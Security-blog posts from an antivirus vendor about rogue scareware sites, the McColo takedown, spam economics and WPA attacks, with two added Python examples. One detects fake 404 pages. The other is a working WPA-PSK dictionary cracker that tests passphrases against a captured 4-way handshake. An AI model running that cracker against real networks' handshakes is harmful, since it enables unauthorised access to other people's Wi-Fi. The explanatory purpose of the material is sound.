Bonjour. By popular demand, E:VOLUTION has been translated into several different languages. You can now find the French version via our YouTube Channel.
Last Friday, we came across a rogue application, VirusResponse Lab 2009, that used a fake 404 page as part of its social engineering attack.
Many rogue affiliate sites use script to generate animated "online scans" and then attempt to convince the visitor to download the rogue installer file via a pop-up dialog.
404dnswebsite .com took a different approach. Rather than producing a fake scan and prompting for a download, it instead simply hosted a fake 404 error message:
If the victim fell for the trick, they would have downloaded what we detect as FraudTool.Win32.Agent.eh.
As you can see from the screenshot above, the fraud page is entirely static. Even though we opened the page with Firefox on a Linux-based system, the page displays the text "Internet Explorer".
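As an added illustration (not part of the original post), the following Python heuristic flags the tells described here: a page whose body announces a 404 while the server actually answered 200, and hard-coded browser text that does not match the requesting User-Agent. It also flags a third tell common to this kind of page, an error page that links to an executable. The HTML, URLs and User-Agent string below are constructed samples, not captures from 404dnswebsite .com.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages; not captured from the site discussed above.
FAKE_404_HTML = """<html><head><title>404 Not Found</title></head><body>
<h1>404 - Page Not Found</h1>
<p>Internet Explorer could not display the page. Please update your browser:
<a href="http://example.invalid/update/iexplorer_update.exe">Download update</a></p>
</body></html>"""

REAL_404_HTML = """<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1><p>The requested URL /missing was not found on this server.</p>
</body></html>"""

# Constructed User-Agent of a Firefox 3 browser on Linux.
FIREFOX_LINUX_UA = ("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) "
                    "Gecko/2008092416 Firefox/3.0.3")

# Browser names a page might hard-code, and the User-Agent token that would justify them.
BROWSER_TOKENS = {
    "Internet Explorer": "MSIE",
    "Firefox": "Firefox",
    "Opera": "Opera",
    "Safari": "Safari",
    "Chrome": "Chrome",
}

# Link targets that have no business on a genuine server error page.
EXECUTABLE_EXT = re.compile(r"\.(exe|msi|scr|com|bat|pif)(\?|#|$)", re.IGNORECASE)


class _PageScanner(HTMLParser):
    """Collects visible text and anchor targets from an HTML document."""

    def __init__(self):
        super().__init__()
        self.text = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)

    def handle_data(self, data):
        self.text.append(data)


def assess_error_page(status: int, html: str, request_ua: str) -> list[str]:
    """Return a list of reasons this 'error page' looks fake; empty means nothing suspicious."""
    scanner = _PageScanner()
    scanner.feed(html)
    text = " ".join(scanner.text)
    findings = []

    # Tell 1: the body says 404, but the HTTP layer did not.
    if re.search(r"\b404\b", text) and status != 404:
        findings.append(f"page text claims 404 but the server answered {status}")

    # Tell 2: an error page offering a download of an executable.
    exe_links = [h for h in scanner.hrefs if EXECUTABLE_EXT.search(h)]
    if exe_links:
        findings.append("error page offers executable download: " + ", ".join(exe_links))

    # Tell 3: static browser text that does not match the browser actually used.
    for name, token in BROWSER_TOKENS.items():
        if name in text and token not in request_ua:
            findings.append(f'page names "{name}" but the User-Agent does not identify it')

    return findings


if __name__ == "__main__":
    for label, status, html in (("fake", 200, FAKE_404_HTML), ("real", 404, REAL_404_HTML)):
        print(label, assess_error_page(status, html, FIREFOX_LINUX_UA))
```

The status-code check is the strongest of the three: a real web server answers a missing resource with HTTP 404, while a hosted lure has to return 200 so the browser renders it. It does produce false positives on misconfigured sites that serve their error pages with 200, so treat the findings as triage hints rather than verdicts.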
What's the story? McColo Corp. — major source of spam — was knocked offline earlier this week. And now there's a large decrease in the amount of spam being distributed.
Why is that? Because McColo Corp. was hosting a large number of spam bot command and control servers. Knocking them offline has left the spam bots temporarily without masters.
Unfortunately the bots themselves are still out there, so the spam will eventually return.
You can download a very detailed report on McColo from hostexploit.com.
There's an interesting study on the economics of spamming, reported today at BBC and The Register.
Spamalytics: An Empirical Analysis of Spam Marketing Conversion was authored by researchers from the University of California, Berkeley, and UC San Diego.
Summary: the Storm botnet sends out spam leading interested parties to two kinds of site, a malware-infected site designed to expand the botnet itself and a pharmacy site promoting "male enhancement drugs". It has been assumed that even a few people buying such products would be enough for spammers to make a huge profit, but few studies have been performed to investigate.
In this study, the researchers infiltrated the Storm botnet's command and control hierarchy to modify a subset of spam already being sent out. The change redirected "any interested recipients to servers under [the researchers'] control, rather than those belonging to the spammer", where the researchers could track sales attempts. They could then use the data to estimate how many actual sales the entire spam operation would be likely to generate.
Interesting points from the analysis: even with a tiny conversion rate of "0.00001 per cent" from spam to sale, spammers can still net a fair bit of profit, but not as much as suggested. Since the conversion rate is so minuscule however, spammers can be really pressured by countermeasures that affect it, like anti-spam filters, blacklists and so on.
The study also clearly documented the reasoning the researchers used to handle the legal and ethical issues they faced, the key points being that: 1) they did not actively send out the spam itself, or create new spam; 2) none of the actions performed under the methodology were "intrinsically objectionable"; and 3) where there was potential for harm, they worked to "strictly reduce" it.
Yesterday's post, Stupid Rogue Trick, took a look at antivirus-online-scanner .com and a rogue application called Antivirus Professional 2008.
The antivirus-online-scanner site was using a GeoIP lookup to customize the supposed threat displayed to visitors. If you visited from Helsinki, Finland, the threat was called something like Win32.IRC.Bot.Helsinki.
A nasty trick for the unsuspecting…
Taking a look today, we discovered that the site is offline. Good news, as such sites are often difficult to get shut down. So, who was the ICANN registrar?
EstDomains. You remember Case EstDomains from two weeks ago don't you?
It seems to be "bad news" season for WPA, as researchers keep finding ways to crack it faster and faster.
Last month, Elcomsoft announced that it had used GPU computing to accelerate its password-recovery tool's brute-force attack on WPA and WPA2 pre-shared keys, reportedly "100 times faster than with just a CPU". Note that this is a dictionary or brute-force attack on the passphrase itself: a long, random passphrase still defeats it, and the speed-up only makes weak passphrases fall sooner.
Now there is another, newly reported attack on WPA's Temporal Key Integrity Protocol (TKIP), which can recover the plaintext of a short encrypted packet such as an Address Resolution Protocol (ARP) request in "less than 15 minutes". Worth noting: it recovers the contents of one short packet and the integrity key, enough to inject a handful of forged frames, but not the network's pre-shared key, and networks using WPA2 with AES-CCMP are not affected. More details are available at The Register.
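To show why the pre-shared key attack mentioned in the Elcomsoft item is expensive per guess, and therefore why GPU parallelism pays off, here is an added Python example (not from Elcomsoft, the TKIP researchers, or the original post). It derives the PMK from a passphrase and SSID with PBKDF2, expands it into the PTK, verifies a candidate passphrase against the MIC of a captured 4-way handshake, and runs a small dictionary attack. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are constructed; the only real-world value is the known-answer vector from the 802.11i standard (passphrase "password", SSID "IEEE"). This illustrates the offline PSK attack, not the TKIP packet attack in the second item.

```python
import hashlib
import hmac
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class Handshake:
    """Fields an attacker captures passively from a WPA 4-way handshake."""
    ssid: str
    ap_mac: bytes      # authenticator address (AA)
    sta_mac: bytes     # supplicant address (SPA)
    anonce: bytes      # 32-byte nonce from message 1
    snonce: bytes      # 32-byte nonce from message 2
    eapol: bytes       # EAPOL-Key message 2 with its 16-byte MIC field zeroed
    mic: bytes         # the MIC as captured
    descriptor_version: int = 1  # 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    The 4096 iterations are the per-guess cost every cracker has to pay."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame using the KCK (first 16 bytes of the PTK)."""
    if version == 1:
        return hmac.new(kck, eapol, hashlib.md5).digest()
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def check_passphrase(candidate: str, hs: Handshake) -> bool:
    """One guess: passphrase -> PMK -> PTK -> KCK -> MIC, compared with the captured MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(candidate, hs.ssid), hs)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.descriptor_version), hs.mic)


def crack(hs: Handshake, wordlist):
    """Dictionary attack; returns the matching passphrase or None."""
    for candidate in wordlist:
        if check_passphrase(candidate, hs):
            return candidate
    return None


def _build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (WPA descriptor) with the MIC field zeroed."""
    body = bytes([0xFE])                       # descriptor type 254 = WPA
    body += (0x0109).to_bytes(2, "big")        # key info: version 1, pairwise, MIC present
    body += (0x0020).to_bytes(2, "big")        # key length
    body += (1).to_bytes(8, "big")             # replay counter
    body += snonce                             # key nonce (SNonce)
    body += bytes(16) + bytes(8) + bytes(8)    # EAPOL IV, RSC, key ID
    body += bytes(16)                          # MIC placeholder (zero while computing)
    body += (0).to_bytes(2, "big")             # key data length
    header = bytes([0x01, 0x03]) + len(body).to_bytes(2, "big")  # 802.1X v1, EAPOL-Key
    return header + body


def make_handshake(passphrase: str, ssid: str = "HomeNet") -> Handshake:
    """Constructed capture: what an AP and client using this passphrase would have produced."""
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = _build_eapol_msg2(snonce)
    unsigned = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, bytes(16))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), unsigned)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol, 1))


if __name__ == "__main__":
    hs = make_handshake("correct horse battery")
    words = ["123456", "password", "letmein", "qwerty", "correct horse battery"]
    start = time.perf_counter()
    found = crack(hs, words)
    per_guess = (time.perf_counter() - start) / len(words)
    print(f"recovered: {found!r}; about {per_guess * 1000:.1f} ms per guess on this CPU")
```

Every wrong guess still costs the full 4096 HMAC-SHA1 iterations of PBKDF2 plus the PTK expansion, which is why throughput, not cleverness, decides this attack and why thousands of GPU cores help. Because the SSID is the PBKDF2 salt, precomputed PMK tables only work per SSID, and a passphrase of 20 or more random characters puts the keyspace out of reach regardless of hardware.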